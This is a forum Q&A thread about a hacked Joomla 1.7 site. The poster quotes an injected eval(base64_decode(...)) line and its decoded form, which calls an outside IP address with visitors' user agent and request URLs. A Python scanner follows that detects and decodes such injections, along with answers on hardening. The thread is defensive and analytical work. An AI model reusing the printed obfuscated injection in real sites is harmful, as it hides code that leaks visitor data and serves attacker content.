
Site backdoor & eval() [closed]

I'm running a Joomla 1.7 site which was hacked today. The script below did the hack.

eval((base64_decode("DQoNCnByaW50IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgvaGxpbmtzL2xpbmtzLnBocD91YT0nIC4gQHVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pIC4gJyZyZXE9JyAuIEB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJy8nIC4gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pKTsNCg0K")));

The line above was injected into the index.php file in my templates folder. Every template in the folder had the above code, repeated a few times in each file.

When I decode the code, it reads:

print @file_get_contents('http://93.115.86.168/hlinks/links.php?ua=' . @urlencode($_SERVER['HTTP_USER_AGENT']) . '&req=' . @urlencode($_SERVER['HTTP_HOST'] . '/' . $_SERVER['REQUEST_URI'])); 

I removed the script and the site now works fine. The script didn't do anything bad except that the site did not load at all.

My problem is: even though I have set the file permissions to 644 and the folder permissions to 755, how could this happen?

How can I figure out what caused the problem? What steps should I take to prevent this from happening in the future?

UPDATE

This Forum Post Assistant / FPA is very helpful

Techie asked Sep 06 '25 03:09
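As an added example (not code from the original post and not Joomla's own tooling), here is a Python scanner that finds the eval(base64_decode(...)) pattern from the question across a templates tree, decodes each payload without ever executing it, and reports the URLs and PHP calls the hidden code contains. It also records the owner and mode of each infected file, because 644/755 only keeps other system users out: a file owned by the web-server account is still writable by any PHP code that account runs, which is how template files usually get rewritten. The base64 payload is the one posted above; the sample templates tree and its directory names (beez_20, atomic) are constructed for the demo.

```python
"""Find eval(base64_decode(...)) injections like the one in the question,
decode the payload statically (never eval it), and report what it does.
Added example for this thread; not code from the original post or from Joomla."""
import base64
import os
import re
import stat
import tempfile

# Matches eval(...base64_decode("<b64>")...) with any number of extra
# parentheses and either quote style, as in the injected line above.
INJECT_RE = re.compile(
    r"""eval\s*\(+\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]\s*\)+""",
    re.IGNORECASE,
)
URL_RE = re.compile(r"""https?://[^\s'"]+""")

# PHP calls worth flagging when they appear in a decoded payload.
SUSPICIOUS = (
    "file_get_contents", "curl_", "fsockopen", "system(", "exec(",
    "shell_exec", "passthru", "eval(", "assert(", "preg_replace(",
)

# The exact base64 string posted in the question (copied from the page).
PAYLOAD = ("DQoNCnByaW50IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgv"
           "aGxpbmtzL2xpbmtzLnBocD91YT0nIC4gQHVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9V"
           "U0VSX0FHRU5UJ10pIC4gJyZyZXE9JyAuIEB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBf"
           "SE9TVCddIC4gJy8nIC4gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pKTsNCg0K")
INJECTED_LINE = 'eval((base64_decode("' + PAYLOAD + '")));'


def decode_payload(b64):
    """Decode base64 leniently (strip whitespace, repair padding); never execute it."""
    clean = re.sub(r"\s+", "", b64)
    clean += "=" * (-len(clean) % 4)
    return base64.b64decode(clean).decode("utf-8", errors="replace").strip()


def analyse_source(src):
    """Return one finding per injected eval(base64_decode(...)) found in src."""
    findings = []
    for m in INJECT_RE.finditer(src):
        decoded = decode_payload(m.group(1))
        findings.append({
            "offset": m.start(),
            "decoded": decoded,
            "urls": URL_RE.findall(decoded),
            "suspicious": [f for f in SUSPICIOUS if f in decoded],
        })
    return findings


def scan_tree(root, exts=(".php", ".phtml", ".inc")):
    """Walk root, analyse PHP-like files, and note owner/mode of each hit so you
    can tell whether the web-server process could have written the file itself."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                findings = analyse_source(fh.read())
            if findings:
                st = os.stat(path)
                results.append({
                    "path": path,
                    "uid": st.st_uid,
                    "mode": stat.filemode(st.st_mode),
                    "count": len(findings),
                    "findings": findings,
                })
    return results


def build_sample_tree():
    """Constructed sample: a tiny templates/ tree with one infected index.php
    (payload repeated twice, as the question describes) and one clean file."""
    root = tempfile.mkdtemp(prefix="joomla_templates_")
    infected = os.path.join(root, "beez_20")
    clean = os.path.join(root, "atomic")
    os.makedirs(infected)
    os.makedirs(clean)
    with open(os.path.join(infected, "index.php"), "w") as fh:
        fh.write(INJECTED_LINE + "\n<?php\n// template code...\n" + INJECTED_LINE + "\n")
    with open(os.path.join(clean, "index.php"), "w") as fh:
        fh.write("<?php\ndefined('_JEXEC') or die;\n")
    return root


if __name__ == "__main__":
    # Point scan_tree() at a real templates/ directory instead of the sample.
    for hit in scan_tree(build_sample_tree()):
        print(f"{hit['path']}  uid={hit['uid']}  mode={hit['mode']}  hits={hit['count']}")
        for f in hit["findings"]:
            print("  decoded   :", f["decoded"])
            print("  calls out :", f["urls"])
            print("  suspicious:", f["suspicious"])
```

Run it against the site's templates directory (and, since injections are rarely confined to one folder, the whole document root) and compare the reported uid against the account the web server runs as: if they match, the 644 mode never stood in the attacker's way, and the next question is which PHP code path, an unpatched extension or a stolen FTP/admin credential, wrote the file.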


2 Answers

It is not reading a file from your file system, but rather reading directly from an external URL. You can disable reading from any external URL in PHP via the php.ini setting:

allow_url_fopen = 0
sg- answered Sep 08 '25 00:09


How about because you're running a Joomla 1.7 site? Joomla 1.7 is no longer supported and several security fixes have been added to Joomla since it was released. You should immediately upgrade to 2.5.9. There should be no backwards compatibility issues, as 2.5.9 is just the Long Term Supported Release of Joomla 1.7.

Check that your PHP settings are as advised in the Joomla Security Checklist here. Make sure your PHP and MySQL versions are reasonably up to date (at least PHP 5.3.x, preferably 5.4.x, and MySQL at least 5.0.4).

Finally, make sure all your extensions are up to date. Again, developers constantly update modules not just to add new features but also to add extra/improved security or to protect against found vulnerabilities!

Also, please note: not turning on allow_url_fopen, as Steven says, will result in Joomla's One-Click-Update ceasing to work properly.

George Wilson answered Sep 08 '25 00:09